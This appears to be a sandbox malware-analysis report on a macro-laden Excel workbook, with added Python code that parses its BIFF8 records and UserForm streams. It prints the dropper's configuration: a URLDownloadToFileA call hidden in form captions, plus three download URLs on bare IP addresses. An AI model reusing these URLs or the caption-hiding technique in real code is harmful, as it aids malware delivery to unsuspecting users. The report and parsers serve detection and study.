      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2774
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2774
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: UserForm1, Stream Size: 1180
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
      VBA File Name:UserForm1
      Stream Size:1180
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.30164724619
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:391141
      Entropy:7.94597570807
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
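The "Applesoft BASIC program data" label above is what a generic file-type probe makes of a BIFF8 stream; the bytes shown are in fact Excel's binary record format (a 2-byte record id, a 2-byte length, then the payload). The following is an added example, not part of the Joe Sandbox report, that walks those records: it parses the 128-byte prefix shown in the Data Raw field (a BOF record for the workbook-globals substream, InterfaceHdr, Mms, InterfaceEnd and the start of a 112-byte WriteAccess record naming the author "Test") and also decodes BoundSheet8 records, which is where a hidden Excel 4.0 macro sheet of the kind the report flags is declared. Record layouts follow [MS-XLS]; the BoundSheet8 records used to exercise the decoder are constructed here, since the report's dump stops before the real ones.

```python
"""Added example (not from the report): BIFF8 record walker for the Workbook stream."""
import struct
from collections import namedtuple

Record = namedtuple("Record", "id length payload truncated")

# Record ids used below ([MS-XLS] 2.4)
BOF, WRITEACCESS, BOUNDSHEET8 = 0x0809, 0x005C, 0x0085
BOF_SUBSTREAMS = {0x0005: "workbook globals", 0x0010: "worksheet or dialog sheet",
                  0x0020: "chart sheet", 0x0040: "macro sheet"}
SHEET_TYPES = {0x00: "worksheet or dialog sheet", 0x01: "macro sheet",
               0x02: "chart sheet", 0x06: "VBA module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}

# First 128 bytes of the Workbook stream as shown in the report's "Data Raw" field.
# The WriteAccess record is 112 bytes long (user name padded with spaces) and the
# dump cuts it off; the padding is reproduced here to the same 128-byte length.
WORKBOOK_PREFIX = bytes.fromhex(
    "09081000 00060500 5a4fcd07 c9000200 06080000"   # BOF: BIFF8, workbook globals
    "e1000200 b004"                                  # InterfaceHdr: code page 1200
    "c1000200 0000"                                  # Mms
    "e2000000"                                       # InterfaceEnd
    "5c007000 04000054 65737420"                     # WriteAccess: cch=4, "Test", padding...
) + b" " * 80


def walk_biff_records(data):
    """Split a BIFF stream into records; a record whose payload runs past the end
    of the data is flagged truncated rather than silently shortened."""
    records, off = [], 0
    while off + 4 <= len(data):
        rid, length = struct.unpack_from("<HH", data, off)
        payload = data[off + 4:off + 4 + length]
        records.append(Record(rid, length, payload, len(payload) < length))
        off += 4 + length
    return records


def decode_bof(payload):
    vers, dt, rup_build, rup_year = struct.unpack_from("<HHHH", payload, 0)
    return {"version": vers, "substream": BOF_SUBSTREAMS.get(dt, "unknown 0x%04x" % dt),
            "build": rup_build, "year": rup_year}


def _xl_string(payload, off, short):
    """XLUnicodeString (2-byte cch) or ShortXLUnicodeString (1-byte cch);
    bit 0 of the flags byte means the characters are UTF-16LE."""
    if short:
        cch, flags = payload[off], payload[off + 1]
        off += 2
    else:
        cch, flags = struct.unpack_from("<HB", payload, off)
        off += 3
    if flags & 1:
        return payload[off:off + 2 * cch].decode("utf-16-le")
    return payload[off:off + cch].decode("latin-1")


def decode_write_access(payload):
    return _xl_string(payload, 0, short=False)


def decode_boundsheet8(payload):
    lb_ply_pos, hs_state, dt = struct.unpack_from("<IBB", payload, 0)
    return {"offset": lb_ply_pos, "visibility": VISIBILITY.get(hs_state & 3, "reserved"),
            "type": SHEET_TYPES.get(dt, "unknown 0x%02x" % dt),
            "name": _xl_string(payload, 6, short=True)}


def make_boundsheet8(offset, hs_state, dt, name):
    """Build a complete BoundSheet8 record (header + payload); constructed test input."""
    body = struct.pack("<IBB", offset, hs_state, dt) + bytes([len(name), 0]) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET8, len(body)) + body


def hidden_macro_sheets(data):
    """Names of sheets declared as macro sheets that are hidden or very hidden."""
    out = []
    for rec in walk_biff_records(data):
        if rec.id == BOUNDSHEET8 and not rec.truncated:
            info = decode_boundsheet8(rec.payload)
            if info["type"] == "macro sheet" and info["visibility"] != "visible":
                out.append(info["name"])
    return out


if __name__ == "__main__":
    for rec in walk_biff_records(WORKBOOK_PREFIX):
        print("0x%04x len=%d truncated=%s" % (rec.id, rec.length, rec.truncated))
```

Run over the full 391,141-byte stream rather than the 128-byte prefix, hidden_macro_sheets() returns the names of the XLM sheets the report's "Hidden Macro 4.0" detection refers to; on the prefix alone the walker stops at the truncated WriteAccess record.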
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:661
      Entropy:5.27224586563
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.35524796933
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:301
      Entropy:4.64742015018
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/f
      File Type:data
      Stream Size:263
      Entropy:3.59027175124
      Base64 Encoded:False
      Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
      Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
      Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/o
      File Type:data
      Stream Size:272
      Entropy:3.7315998228
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
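The UserForm1 streams above are where this workbook keeps its network configuration: the VBFrame caption is the API name "URLDownloadToFileA", and the label captions in the "o" stream hold the library name "uRlMon" and the three download URLs (http://190.14.37.173/, http://111.90.148.104/, http://51.89.115.111/). None of that appears in VBA source, so a scan of macro code alone misses it. The following is an added example, not part of the Joe Sandbox report, that recovers such strings from an MS-OFORMS control stream. It runs over the 128 bytes shown in the Data Raw field (the stream is 272 bytes; the report truncates the dump); the fmString length-field layout is from [MS-OFORMS], and the records for the two URLs that lie beyond the dump are constructed for the test.

```python
"""Added example (not from the report): string recovery from an MS-OFORMS "o" stream."""
import struct

# First 128 bytes of _VBA_PROJECT_CUR/UserForm1/o, copied from the report's Data Raw field.
USERFORM_O_PREFIX = bytes.fromhex(
    "00022800 28000000 15000080 68747470 3a2f2f31 39302e31 342e3337 2e313733"
    "2f010000 00000000 00000000 00021800 35000000 06000080 a5000000 cc020000"
    "5461686f 6d610318 00021800 28000000 06000080 75526c4d 6f6e0000 00000000"
    "d4000000 00021800 35000000 06000080 a5000000 cc020000 5461686f 6d6101f4"
)

# MS-OFORMS fmString: uint32 LE byte count; bit 31 set means one byte per character.
COMPRESSED_FLAG = 0x80000000


def extract_oforms_strings(data, min_len=1, max_len=1024):
    """Scan for fmString length fields (compressed flag set) that are immediately
    followed by that many printable ASCII bytes.  Strings embedded in larger
    structures are not matched (the font name "Tahoma" here sits behind an 8-byte
    font-record prefix); caption and tag text, which is what matters, is."""
    found, i = [], 0
    while i + 4 <= len(data):
        size = struct.unpack_from("<I", data, i)[0]
        if size & COMPRESSED_FLAG:
            n = size & 0x7FFFFFFF
            chunk = data[i + 4:i + 4 + n]
            if min_len <= n <= max_len and len(chunk) == n and all(0x20 <= b < 0x7F for b in chunk):
                found.append(chunk.decode("ascii"))
                i += 4 + n
                continue
        i += 1
    return found


def urls_from_form(data):
    """The subset of recovered strings that are HTTP(S) URLs, i.e. the download list."""
    return [s for s in extract_oforms_strings(data)
            if s.lower().startswith(("http://", "https://"))]


def fm_string(text):
    """Encode text as a compressed fmString (constructed records for testing)."""
    return struct.pack("<I", COMPRESSED_FLAG | len(text)) + text.encode("ascii")


if __name__ == "__main__":
    for s in extract_oforms_strings(USERFORM_O_PREFIX):
        print(repr(s))
```

The scan is deliberately strict (length field immediately followed by printable bytes) so that it yields caption text without a full parse of the control records; on the real 272-byte stream it returns all three URLs, on the 128-byte prefix only the first.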
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:3819
      Entropy:4.49037503963
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2035
      Entropy:3.42846113886
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
